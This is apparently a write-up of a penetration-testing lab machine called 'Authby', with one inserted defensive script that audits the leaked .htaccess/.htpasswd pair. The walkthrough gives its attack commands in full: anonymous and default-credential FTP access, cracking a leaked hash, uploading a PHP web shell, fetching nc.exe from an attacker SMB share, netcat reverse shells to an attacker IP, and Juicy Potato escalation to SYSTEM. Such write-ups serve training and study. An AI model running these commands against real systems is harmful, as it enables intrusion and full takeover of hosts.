# Authby

## Service Enumeration

`nmapAutomator.sh -H 192.168.85.46 -t full`

`nmapAutomator.sh -H 192.168.85.46 -t vulns`

### FTP

Anonymous login allowed.

![](/files/-MadXfNcM9v7WmlLncKg)

While we cannot access these files, we can see that there are some account names.

![](/files/-MadXiE_cH4Li2XQWSSl)

Using the account `admin:admin`, we get access to some other files.

![](/files/-MadXmeh055WyDtgQUnN)

The `.htaccess` and `.htpasswd` files are leaked.

![](/files/-MadXw2upjOEf_Z26MPL)

`.htaccess`:

```
AuthName "Qui e nuce nuculeum esse volt, frangit nucem!"
AuthType Basic
AuthUserFile c:\\wamp\www\.htpasswd
<Limit GET POST PUT>
Require valid-user
</Limit>
```

`.htpasswd`:

```
offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0
```

Passing the `.htpasswd` hash into John the Ripper, we find the credentials to authenticate into the HTTP server.

![](/files/-MadXzhzgm-OzVSjrsnf)

![](/files/-MadY0kOS_jF1p3jw5h6)
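From the defender's side, the two leaked files show exactly why the Basic Auth credentials were recoverable: the password file sits inside the document root (so the FTP `admin` account could read it) and the hash is APR1 MD5-crypt, which John cracks quickly. The following Python script is an added example, not part of the original writeup; it audits an `.htaccess`/`.htpasswd` pair for those conditions, using the file contents shown above as constructed input and assuming the default WAMP document root `c:\wamp\www`.

```python
import re

# Constructed copies of the two files recovered over FTP (contents as shown above)
HTACCESS = r'''AuthName "Qui e nuce nuculeum esse volt, frangit nucem!"
AuthType Basic
AuthUserFile c:\\wamp\www\.htpasswd
<Limit GET POST PUT>
Require valid-user
</Limit>
'''
HTPASSWD = "offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0\n"
DOCROOT = r"c:\wamp\www"  # assumed default WAMP document root

# Hash schemes htpasswd can emit: (prefix, description, considered weak)
SCHEMES = [
    ("$2y$", "bcrypt", False),
    ("$apr1$", "APR1 MD5-crypt, fast to brute-force offline", True),
    ("{SHA}", "unsalted SHA-1", True),
]

def hash_scheme(hashed):
    for prefix, name, weak in SCHEMES:
        if hashed.startswith(prefix):
            return name, weak
    return "crypt(3) or plaintext", True  # 13-char DES crypt or a literal password

def norm(path):
    # Collapse the doubled backslash seen in the leaked file; Windows paths are case-insensitive
    return path.replace("\\\\", "\\").lower().rstrip("\\")

def audit(htaccess, htpasswd, docroot):
    findings = []
    m = re.search(r"^AuthUserFile\s+(\S+)", htaccess, re.M)
    if m and norm(m.group(1)).startswith(norm(docroot)):
        findings.append(f"AuthUserFile {m.group(1)} is inside the document root; move it outside")
    for line in htpasswd.splitlines():
        if ":" not in line:
            continue
        user, hashed = line.split(":", 1)
        name, weak = hash_scheme(hashed)
        if weak:
            findings.append(f"user {user}: {name}; rehash with 'htpasswd -B'")
    if re.search(r"^<Limit\b", htaccess, re.M):
        findings.append("Require is inside <Limit>; methods not listed there bypass auth")
    return findings

if __name__ == "__main__":
    for f in audit(HTACCESS, HTPASSWD, DOCROOT):
        print("-", f)
```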

### RDP

![](/files/-MadY3fQsfHGm3NbFZiG)

### Nonstandard Ports

![](/files/-MadY76Jsst-jzhbW-4U)

### HTTP

![](/files/-MadYBjXpH_GzQksHxDb)

Using the previously found credentials (`offsec:elite`), we can authenticate into the application.

![](/files/-MadYFL5F3_KnoNUydZ7)

### Subdirectory Enumeration

`gobuster dir -u http://192.168.85.46:242/ -w /usr/share/dirb/wordlists/common.txt -k -x .txt,.php --threads 50 -U offsec -P elite`

![](/files/-MadYIzqbbtUSKYFOTm7)

`gobuster dir -u http://192.168.85.46:242/phpmyadmin -w /usr/share/dirb/wordlists/common.txt -k -x .txt,.php --threads 50 -U offsec -P elite -s 200,204,301,302,307,401`

## Exploitation

Using the PHP backdoor from `/usr/share/webshells/php/simple-backdoor.php`, we can upload this backdoor through the `admin` FTP account to the web root. Then, we can visit the `simple-backdoor.php` and use the `cmd=` parameter to achieve RCE.

![](/files/-MadZtESeN0hNTXrq5gB)

Copy `nc.exe` through SMB:

`http://192.168.85.46:242/simple-backdoor.php?cmd=copy \\192.168.49.85\ROPNOP\netcat\nc.exe .`

Trigger a reverse shell:

`http://192.168.85.46:242/simple-backdoor.php?cmd=nc.exe -e cmd.exe 192.168.49.85 443`

On our listening machine, we get a reverse shell.

![](/files/-Mad_5-p9W7ZZtrXbi2u)

![](/files/-Mad_8-VgsTflDIu_1zS)

## Privilege Escalation

First, we know that `SeImpersonatePrivilege` is enabled.

![](/files/-Mad_AlRF_tTDNqCeRV1)

We can perform privilege escalation using Juicy Potato.

However, there are two challenges.

1. This is an x86 system, so we need an x86 Juicy Potato executable. I used the one from here: <https://github.com/ivanitlearning/Juicy-Potato-x86/releases>
2. The default CLSID doesn't work. Juicy Potato will return `COM -> recv failed with error: 10038`.

`systeminfo` shows that this is Windows Server 2008.

![](/files/-Mad_NN84nAChOzHlVg9)

We can use one of the BITS CLSIDs from here: <https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_Server_2008_R2_Enterprise>. I used `{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}`.

![](/files/-Mad_RHKJA_M64fZuiRq)

Now, we can use the `nc.exe` we transferred previously to get another reverse shell, this time with SYSTEM privileges.

`juicy.potato.x86.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\wamp\www\nc.exe -e cmd.exe 192.168.49.85 443" -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}`

![](/files/-Mad_U7eBddgurKeckVj)

On our listening machine:

![](/files/-Mad_X7gDy37I3DdV4_l)

![](/files/-Mad__CyRLbFxkMgBRVt)
